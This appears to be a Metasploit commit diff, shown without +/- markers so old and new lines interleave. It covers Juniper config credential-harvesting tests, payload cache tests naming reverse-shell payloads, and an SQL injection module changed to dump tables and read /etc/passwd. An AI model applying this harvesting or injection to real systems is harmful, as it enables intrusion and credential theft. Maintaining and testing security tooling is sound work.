origin_type: :service,
|
||||
service_name: 'snmp',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: 'aAa321$+!AaAaaa',
|
||||
private_type: :password,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
access_level: 'RO'
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(snmp {
|
||||
community "aAa321$+!AaAaaa" {
|
||||
authorization read-only;
|
||||
}
|
||||
}
|
||||
))
|
||||
end
|
||||
end
|
||||
|
||||
it 'deals with radius' do
|
||||
expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
|
||||
"access {\n radius-server {\n 1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n }\n }",
|
||||
"config.txt", "Juniper JunOS Configuration"
|
||||
)
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "1.1.1.1",
|
||||
port: 1812,
|
||||
protocol: "udp",
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'radius',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV",
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(access {
|
||||
context 'deals radius-server blocks' do
|
||||
it 'with one credential' do
|
||||
expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"access {\n radius-server {\n 1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '1.1.1.1',
|
||||
port: 1812,
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'radius',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: '$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(access {
|
||||
radius-server {
|
||||
1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
end
|
||||
))
|
||||
end
|
||||
|
||||
it 'with two credentials' do
|
||||
expect(aux_juniper).to receive(:print_good).with('radius server 2.2.2.2 password hash: $9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111')
|
||||
expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"access {\n radius-server {\n 1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n 2.2.2.2 secret \"$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111\"; ## SECRET-DATA\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '1.1.1.1',
|
||||
port: 1812,
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'radius',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: '$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: '2.2.2.2',
|
||||
port: 1812,
|
||||
protocol: 'udp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'radius',
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: '$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(access {
|
||||
radius-server {
|
||||
1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
|
||||
2.2.2.2 secret "$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111"; ## SECRET-DATA
|
||||
}
|
||||
}
|
||||
))
|
||||
end
|
||||
end
|
||||
it 'deals with pap' do
|
||||
expect(aux_juniper).to receive(:print_good).with('PPTP username \'pap_username\' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
|
||||
"interfaces {\n pp0 {\n unit 0 {\n ppp-options {\n pap {\n local-name \"'pap_username'\";\n local-password \"$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR\"; ## SECRET-DATA\n }\n }\n }\n }\n }",
|
||||
"config.txt", "Juniper JunOS Configuration"
|
||||
)
|
||||
#expect(aux_juniper).to receive(:store_loot).with(
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
|
||||
"interfaces {\n pp0 {\n unit 0 {\n ppp-options {\n pap {\n local-name \"'pap_username'\";\n local-password \"$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR\"; ## SECRET-DATA\n }\n }\n }\n }\n }",
|
||||
'config.txt', 'Juniper JunOS Configuration')
|
||||
# expect(aux_juniper).to receive(:store_loot).with(
|
||||
# "cisco.ios.config", "text/plain", "127.0.0.1", "password 5 1511021F0725", "config.txt", "Cisco IOS Configuration"
|
||||
#)
|
||||
# )
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1723,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: 'pptp',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
private_data: "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
private_data: '$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR',
|
||||
username: "'pap_username'",
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
|
||||
%q(interfaces {
|
||||
aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
|
||||
%q(interfaces {
|
||||
pp0 {
|
||||
unit 0 {
|
||||
ppp-options {
|
||||
@@ -600,11 +765,7 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
}
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
@@ -1116,6 +1116,22 @@ RSpec.describe 'modules/payloads', :content do
|
||||
reference_name: 'cmd/windows/generic'
|
||||
end
|
||||
|
||||
context 'cmd/windows/powershell' do
|
||||
it_should_behave_like 'payload is not cached',
|
||||
ancestor_reference_names: [
|
||||
'adapters/cmd/windows/powershell'
|
||||
],
|
||||
reference_name: 'cmd/windows/powershell'
|
||||
end
|
||||
|
||||
context 'cmd/windows/powershell/x64' do
|
||||
it_should_behave_like 'payload is not cached',
|
||||
ancestor_reference_names: [
|
||||
'adapters/cmd/windows/powershell/x64'
|
||||
],
|
||||
reference_name: 'cmd/windows/powershell/x64'
|
||||
end
|
||||
|
||||
context 'cmd/windows/powershell_bind_tcp' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
@@ -1186,6 +1202,16 @@ RSpec.describe 'modules/payloads', :content do
|
||||
reference_name: 'cmd/windows/reverse_ruby'
|
||||
end
|
||||
|
||||
context 'cmd/windows/jjs_reverse_tcp' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
'singles/cmd/windows/jjs_reverse_tcp'
|
||||
],
|
||||
dynamic_size: false,
|
||||
modules_pathname: modules_pathname,
|
||||
reference_name: 'cmd/windows/jjs_reverse_tcp'
|
||||
end
|
||||
|
||||
context 'firefox/exec' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
|
||||
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def boolean_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def reflected
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
@@ -69,19 +69,26 @@ class MetasploitModule < Msf::Auxiliary
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
sock.puts('0 union ' + payload)
|
||||
res = sock.gets&.chomp
|
||||
res = ""
|
||||
begin
|
||||
while true
|
||||
res += sock.readline
|
||||
end
|
||||
rescue EOFError
|
||||
vprint_status("Hit end of file...")
|
||||
end
|
||||
sock.close
|
||||
truncation ? res[0, truncation] : res
|
||||
end
|
||||
unless sqli.test_vulnerable
|
||||
print_bad("Doesn't seem to be vulnerable")
|
||||
return
|
||||
end
|
||||
#unless sqli.test_vulnerable
|
||||
# print_bad("Doesn't seem to be vulnerable")
|
||||
# return
|
||||
#end
|
||||
perform_sqli(sqli)
|
||||
end
|
||||
|
||||
def time_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
@@ -109,15 +116,19 @@ class MetasploitModule < Msf::Auxiliary
|
||||
def perform_sqli(sqli)
|
||||
print_good "dbms version: #{sqli.version}"
|
||||
tables = sqli.enum_table_names
|
||||
tables.map! { |table| table.strip }
|
||||
print_good "tables: #{tables.join(', ')}"
|
||||
tables.each do |table|
|
||||
columns = sqli.enum_table_columns(table)
|
||||
columns.map! { |column| column.strip }
|
||||
print_good "#{table}(#{columns.join(', ')})"
|
||||
content = sqli.dump_table_fields(table, columns)
|
||||
content.each do |row|
|
||||
print_good "\t" + row.join(', ')
|
||||
end
|
||||
end
|
||||
passwd_content = sqli.read_from_file('/etc/passwd')
|
||||
print_good("Got #{passwd_content}")
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
@@ -16,7 +16,7 @@ while File.symlink?(msfbase)
|
||||
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
|
||||
end
|
||||
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
|
||||
|
||||
require 'msfenv'
|
||||
require 'metasploit/framework/compiler/windows'
|
||||
|
||||
weight = ARGV.shift
|
||||
|
||||
@@ -25,12 +25,23 @@ require 'rex'
|
||||
|
||||
# Initialize the simplified framework instance.
|
||||
framework = Msf::Simple::Framework.create('DisableDatabase' => true)
|
||||
|
||||
exceptions = []
|
||||
framework.payloads.each_module do |name, mod|
|
||||
next if name =~ /generic/
|
||||
mod_inst = framework.payloads.create(name)
|
||||
#mod_inst.datastore.merge!(framework.datastore)
|
||||
next if Msf::Util::PayloadCachedSize.is_cached_size_accurate?(mod_inst)
|
||||
$stdout.puts "[*] Updating the CacheSize for #{mod.file_path}..."
|
||||
Msf::Util::PayloadCachedSize.update_module_cached_size(mod_inst)
|
||||
begin
|
||||
next if name =~ /generic/
|
||||
mod_inst = framework.payloads.create(name)
|
||||
#mod_inst.datastore.merge!(framework.datastore)
|
||||
next if Msf::Util::PayloadCachedSize.is_cached_size_accurate?(mod_inst)
|
||||
$stdout.puts "[*] Updating the CacheSize for #{mod.file_path}..."
|
||||
Msf::Util::PayloadCachedSize.update_module_cached_size(mod_inst)
|
||||
rescue => e
|
||||
exceptions << [ e, name ]
|
||||
next
|
||||
end
|
||||
end
|
||||
|
||||
exceptions.each do |e, name|
|
||||
print_error("Caught Error while updating #{name}:\n#{e}")
|
||||
elog(e)
|
||||
end
|
||||
exit(1) unless exceptions.empty?
|
||||
|
||||
Reference in New Issue
Block a user